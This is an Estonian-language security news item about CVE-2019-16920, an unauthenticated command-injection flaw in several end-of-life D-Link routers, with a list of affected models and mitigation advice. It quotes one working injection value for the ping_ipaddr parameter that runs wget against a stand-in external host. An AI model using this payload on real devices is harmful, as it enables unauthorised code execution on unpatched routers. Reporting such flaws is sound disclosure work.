Kaugkasutav haavatavus D-Linki ruuterites

D-Linki juhtmeta ruuterites tuvastatud ohtlik haavatavus (CVE-2019-16920), mis võimaldab teil koodi kaugkäivitada seadme poolel, saates eripäringu töötlejale "ping_test", millele pääseb juurde ilma autentimiseta.

Huvitav on see, et püsivara arendajate sõnul tuleks “ping_test” kõne sooritada alles pärast autentimist, kuid tegelikkuses kutsutakse see välja igal juhul, sõltumata veebiliidese sisselogimisest. Täpsemalt, kui pääsete juurde skriptile apply_sec.cgi ja edastate parameetri "action=ping_test", suunab skript autentimislehele, kuid teostab samal ajal ping_testiga seotud toimingu. Koodi käivitamiseks kasutati ping_testis endas teist haavatavust, mis kutsub välja pingi utiliidi ilma testimiseks saadetud IP-aadressi õigsust korralikult kontrollimata. Näiteks utiliidi wget kutsumiseks ja käsu „echo 1234” tulemuste edastamiseks välisele hostile määrake lihtsalt parameeter „ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".

Kaugkasutav haavatavus D-Linki ruuterites

Haavatavuse olemasolu on ametlikult kinnitatud järgmistes mudelites:

  • DIR-655 püsivaraga 3.02b05 või vanem;
  • DIR-866L püsivaraga 1.03b04 või vanem;
  • DIR-1565 püsivaraga 1.01 või vanem;
  • DIR-652 (probleemsete püsivara versioonide kohta teavet ei pakuta)

Nende mudelite tugiperiood on juba läbi, seega D-Link ta märkis, mis ei anna nende jaoks haavatavuse kõrvaldamiseks värskendusi välja, ei soovita neid kasutada ja soovitab need uute seadmetega asendada. Turvalahendusena saate piirata juurdepääsu veebiliidesele ainult usaldusväärsete IP-aadressidega.

Hiljem avastati, et haavatavus oli ka mõjutab mudelid DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 ja DIR-825, mille uuenduste väljaandmise plaanid pole veel teada.

Allikas: opennet.ru

Lisa kommentaar